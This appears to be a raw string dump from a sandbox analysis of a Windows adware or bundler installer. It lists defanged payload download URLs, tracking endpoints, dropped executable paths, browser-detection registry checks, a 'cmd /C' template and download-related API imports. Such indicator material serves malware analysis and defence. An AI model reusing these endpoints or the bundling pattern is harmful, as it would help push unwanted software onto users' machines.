2~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
2~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1454464
1454464
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe"
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe"
{EEEE69B8-2C42-4825-B8E6-9597957D672B}
{EEEE69B8-2C42-4825-B8E6-9597957D672B}
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
ft Windows XP
ft Windows XP
"%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe"
"%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731
dag17797.exe
dag17797.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd4.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe
1638692
1638692
738853988
738853988
1310942
1310942
1114350
1114350
1048822
1048822
1310906
1310906
194.242.96.218_2015-09-08_00:22:25
194.242.96.218_2015-09-08_00:22:25
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1245428
1245428
872744016
872744016
1114338
1114338
hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.php
hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.php
hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php
\Program Files\Internet Explorer\iexplore.exe" -nohome
\Program Files\Internet Explorer\iexplore.exe" -nohome
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip
hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip
hXXp://VVV.djapp.info/?file=bundle
hXXp://VVV.djapp.info/?file=bundle
hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip
hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip
O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
RE3|Opera Software
RE3|Opera Software
Opera
Opera
.96.218_2015-09-08_00:22:25
.96.218_2015-09-08_00:22:25
iliateId.php
iliateId.php
mote.php
mote.php
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\FirstResult.txt
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\FirstResult.txt
76#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
76#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
tp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip
tp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip
p_17970.exe
p_17970.exe
djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01
djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01
systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
Default,RE2|Opera Software,RE3|Opera Software
Default,RE2|Opera Software,RE3|Opera Software
oudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
oudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
)-.Yln
)-.Yln
Nullsoft Install System v11-Jul-2014.cvs
Nullsoft Install System v11-Jul-2014.cvs
hXXp://VVV.microsoft.com
hXXp://VVV.microsoft.com
dag17797.exe_552_rwx_10004000_00001000:
callback%d
callback%d
taedko.exe_1604:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
D$@j.Xf
D$@j.Xf
>%u0V
>%u0V
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
M%D,3
M%D,3
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
n%D,3
n%D,3
%s\data
%s\data
%s%s.js
%s%s.js
jquery4toolbar.js
jquery4toolbar.js
content/jquery4toolbar.js
content/jquery4toolbar.js
TrayIcons/logo.ico
TrayIcons/logo.ico
logo.ico
logo.ico
In CallJS -> %s
In CallJS -> %s
In CallJS.Invoke -> 0xX
In CallJS.Invoke -> 0xX
in DispInvoke: Searching -> %s
in DispInvoke: Searching -> %s
atiexecute
atiexecute
-exe "%s"
-exe "%s"
..\GetStylesUpdater.exe
..\GetStylesUpdater.exe
%s%s.exe
%s%s.exe
chrome.exe
chrome.exe
%s --new-window --app-window-size=%d,%d --app="%s"
%s --new-window --app-window-size=%d,%d --app="%s"
cmd /C %s
cmd /C %s
http\shell\open\command
http\shell\open\command
chrome
chrome
firefox
firefox
opera
opera
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
%sTrayIcons\
%sTrayIcons\
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
close://close.it/
close://close.it/
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
Chrome_WidgetWin_1
Chrome_WidgetWin_1
MozillaWindowClass
MozillaWindowClass
%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s
hXXp://
hXXp://
%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s
\\.\pipe\61FDC17A-A7B6-4BEB-9B8E-1709DF12376C
\\.\pipe\61FDC17A-A7B6-4BEB-9B8E-1709DF12376C
%s%s.dat
%s%s.dat
advapi32.dll
advapi32.dll
RegDeleteKeyA
RegDeleteKeyA
%sLow
%sLow
RegDeleteKeyExA
RegDeleteKeyExA
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s
%s%s%s%s
%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
RegCreateKeyTransactedA
RegCreateKeyTransactedA
RegOpenKeyTransactedA
RegOpenKeyTransactedA
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
Advapi32.dll
Advapi32.dll
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
DisconnectNamedPipe
DisconnectNamedPipe
KERNEL32.dll
KERNEL32.dll
EnumWindows
EnumWindows
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyW
RegOpenKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
URLDownloadToCacheFileA
URLDownloadToCacheFileA
urlmon.dll
urlmon.dll
gdiplus.dll
gdiplus.dll
OLEACC.dll
OLEACC.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe
9!919;9_9
9!919;9_9
283F3a3~3
283F3a3~3
4'454-8@8
4'454-8@8
4'444=4{:
4'444=4{:
combase.dll
combase.dll
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
update.exe
update.exe
%s\Volatile Environment
%s\Volatile Environment
.default
.default
S-%d-%x-%lu-%lu-%lu-%lu-%lu-%lu-%lu-%lu
S-%d-%x-%lu-%lu-%lu-%lu-%lu-%lu-%lu-%lu
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}